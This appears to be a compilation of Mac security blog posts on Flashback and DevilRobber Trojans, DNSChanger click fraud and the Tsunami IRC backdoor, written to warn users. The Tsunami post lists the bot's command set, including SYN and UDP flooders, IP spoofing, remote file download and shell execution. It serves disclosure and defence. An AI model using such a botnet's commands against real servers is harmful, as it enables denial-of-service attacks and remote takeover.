The Mac Security Blog
Apple has recently updated its Xprotect file quarantine system, used to check for malware downloaded by certain programs – notably Safari, Mail and iChat – but Intego has spotted a new variant of the Flashback Trojan horse, called OSX/FlashBack.J. This variant was released after Apple’s update, and Xprotect does not recognize it yet.
VirusBarrier X6′s generic signatures already detected this new variant, and will probably detect many future variants as well.
Intego’s malware researchers have found a new variant of the DevilRobber Trojan horse, which they first discovered in October. The latest variant – DevilRobber.D (there have been two others in between) – has been spotted in three Mac applications distributed via BitTorrent trackers. The applications in question are Writer’s Café, EvoCam and Twitterrific.
It is important to note that the original applications, obtained from the developers’ web sites, are not infected, but that malicious users distribute infected versions via BitTorrent trackers. If you use these applications, and have purchased them from the developers, you have nothing to worry about.
In the meantime, VirusBarrier X6 protects against this Trojan horse. Intego updated its malware definitions to recognize this malware, but the existing malware definitions, for previous variants, already blocked it.
As Americans enjoy their long Thanksgiving weekend, malware writers are thankful for only one thing: more and more Mac users are getting tricked into installing their wares. The Flashback Trojan horse, that we reported on here, then discussed a new variant, then another new variant, has bred several new variants. Intego has spotted several new versions of this malware, which, while not changing the features of the malware, have changed the code, in an attempt to sneak through malware protection, such as that of VirusBarrier X6.
The bogus alerts you see on sites serving this malware haven’t changed:
But the effect is the same. When you end up on a site like this, an installation package is automatically downloaded, and, if your browser settings allow it, launched so you’ll see an Installer window.
As we said in a previous article, if you see a web page similar to that shown above, do not run any installer, and if the Installer window does not open, check your Downloads folder for any package file that contains the name Flash, then delete it. Only download Flash Player installers from the Adobe web site.
Operation Ghost Click; this sounds like something out of 24. But it’s a 2-year FBI investigation that brought down “a sophisticated Internet fraud ring that infected millions of computers worldwide with a virus and enabled the thieves to manipulate the multi-billion-dollar Internet advertising industry.”
These cyber-criminals used the malware to do what is called “click fraud.” When you click on an ad or an advertising link on a web page, you expect to go to the web site that’s advertising. Under these schemes, using malware that changed the DNS (domain name server) settings on infected computers, you would instead be taken to a different computer, where you might go to a bogus web site, and potentially purchase something you thought was from a legitimate retailer; or be taken to web sites that earn money by displaying ads, often ads for pornographic web sites.
The FBI estimates that “more than four million computers in over 100 countries — including an estimated 500,000 PCs in the United States” were infected by this malware, which is the DNSChanger family. This includes the RSPLug Trojan horse, which Intego discovered on October 31, 2007, and which spawned a number of variants and infected many Macs. (It should be noted that those behind the RSPlug Trojan horse stopped their activities before those controlling Windows malware. It’s likely that these were not the same people.)
We’ve often pointed out that the people behind today’s malware are out to make money. That’s why they attacked Macs with fake antivirus software, and that’s why they attacked Macs with the RSPlug Trojan horse, among others. This FBI takedown is important, in that it shows that the FBI was able to work closely with security researchers and law enforcement agencies around the world to pinpoint the command and control servers that were behind this scheme. Security journalist Brian Krebs gives more info on exactly how this happened.
So stay safe. Don’t download software from untrusted web sites, and protect your Mac with anti-malware software, just in case. It’s easy to get infected, and if you’re not protected, it’s hard to know if your Mac is compromised.
A new backdoor and hacker tool, Tsunami, has been discovered. This hacker tool seems to be a port of a Linux malware, which has been around for some time, and provides remote access to hackers by listening in on an IRC (Internet relay chat) channel for instructions.
Tools like this are often used for distributed denial of service (DDoS) attacks (more on that below). These attacks flood computers with standard network requests, with a goal of overloading them. If a server receives more requests than it can handle, it can slow down, or even crash.
The Tsunami backdoor accepts a number of commands, and can change servers, download files, such as updates, and send packets to a specified IP address.
* TSUNAMI <target> <secs> = A PUSH+ACK flooder * * PAN <target> <port> <secs> = A SYN flooder * * UDP <target> <port> <secs> = An UDP flooder * * UNKNOWN <target> <secs> = Another non-spoof udp flooder * * NICK <nick> = Changes the nick of the client * * SERVER <server> = Changes servers * * GETSPOOFS = Gets the current spoofing * * SPOOFS <subnet> = Changes spoofing to a subnet * * DISABLE = Disables all packeting from this bot * * ENABLE = Enables all packeting from this bot * * KILL = Kills the knight * * GET <http address> <save as> = Downloads a file off the web * * VERSION = Requests version of knight * * KILLALL = Kills all current packeting * * HELP = Displays this * * IRC <command> = Sends this command to the server * * SH <command> = Executes a command *
Source code for this backdoor has been publicly available since at least September 2009, and it is trivial to compile this code, using Apple’s XCode, and create a Mac executable.
This tool requires installation, and may actually be installed manually by people who choose to participate in DDoS attacks, such as those in the Anonymous group.
Individual users generally have little to fear from these tools. However, servers connected to the Internet can be vulnerable to remote installation. Hackers can take advantage of weaknesses in server tools, or especially PHP vulnerabilities, to gain access to a server and install a tool like this. In addition, once such a tool has been installed, the remote hacker can install other software onto the infected Mac.
What is a denial of service attack?
A denial of service attack, or a distributed denial of service attack (DDoS), occurs when one or many computers “gang up” on a web site or server by sending a flood of traffic to that server. Most web servers can handle standard traffic of a certain number of connection attempts per second. Large web sites, such as the biggest online retailers, can handle thousands of connections a second or more. But when thousands of computers get together and send requests all at the same time, sending “floods” of requests, servers have trouble remaining operable. When this type of attack happens, most firewalls will act and block the sending address, but in sophisticated attacks, these addresses are forged, and may change with each new packet.
Denial of service attacks are illegal; they are done for malicious purposes, such as to prevent a web site from functioning, or to block network traffic to and from a specific server. In some cases, such as Operation Payback, denial of service attacks were launched by a company paid by some Bollywood movie studios to attack websites that would not take down copyrighted material. After this, a retaliatory attack was made against a number of copyright organizations, law firms and others. Another attack was made on financial organizations that refused to process donations to Wikileaks.
Some users may install the Tsunami backdoor intentionally, to be part of such attacks. It is also possible that this tool is installed remotely on servers to increase the number of computers participating in such attacks, and, therefore, their effectiveness.
Hacker tools and their usage
Tsunami is one of the many dozens of hacker tools that Intego VirusBarrier X6 protects against. These are tools that are used to attack a machine other than the one on which it is installed, and include tools for executing DDoS attacks, scanning ports, sniffing network traffic, searching for known vulnerabilities and much more.
Most hacker tools are in limited circulation, and are not used for direct attacks; they need to be manually installed on computers, after which they are operated remotely. As such, their threat level is generally very low. Nevertheless, VirusBarrier X6 protects against all such tools, notably to protect servers where they may be installed via exploits that take advantage of vulnerabilities in third-party code, such as PHP.
In any case, Intego has updated the threat filters for VirusBarrier X6 to protect against this backdoor; threat filters dated October 25, 2011 or later, will spot and block this malware as OSX/Tsunami.A.
A security firm has published some information on a new variant of the Flashback Trojan horse, which Intego discovered in September. This new variant, which they are calling Flashback.C is the variant that Intego spotted a week ago, Flashback.D. (It’s not uncommon for different security companies to name variants differently; we may have more variants than other companies.)
Some of the information published about this variant is interesting, notably the fact that it can disable Apple’s Xprotect malware detection system. When disabling the Xprotect system, the Trojan horse overwrites certain files (notably the info.plist file for the XProtectUpdater daemon, which prevents Mac OS X from getting updates to this file), which means that VirusBarrier X6 cannot repair the damage. (In order to repair it, VirusBarrier X6 would need to re-install a new version of the file; the program cannot simply erase changes made, since the file is overwritten entirely.)
Some companies have published instructions for manually removing this malware, but it is important to note that such instructions only discuss removing code added to the Safari or Firefox web browsers; given the damage done to the XProtect system, manual repair is impossible. (It is technically possible to recover the XProtect file from a backup, if a user has cloned their startup volume, such as with Intego Personal Backup, which is part of Internet Security Barrier, or made a full system backup with Apple’s Time Machine; this entails restoring the /usr/libexec/XProtectUpdater daemon. Users should be very careful if they do this manually, as opposed to using the restoration function of Personal Backup or Time Machine, as permissions on the file could cause the daemon to not function correctly.)
This is the first malware affecting Mac OS X that we have seen that intentionally damages system files. Because of this, repairing damage can be very time-consuming. Even with the appropriate, up-to-date backups, it still takes time to restore the operating system. In the Windows world, the most common method for dealing with this type of file corruption is to re-install the entire operating system. We hope Mac malware doesn’t use similar techniques in the future that would require a full installation of Mac OS X to repair damage. Of course, it is wise to protect one’s Mac with antivirus software to ensure that such damage doesn’t occur in the first place.
Since Intego discovered this variant of the Flashback Trojan horse, the command and control servers that the malware contacts have been inoperable. However, now that this Trojan horse is in the news again, these servers have awakened, and Intego has seen activity today, sending updates to installed malware.
Intego VirusBarrier X6, with malware definitions dated October 13, 2011, or later, detects and blocks this malware.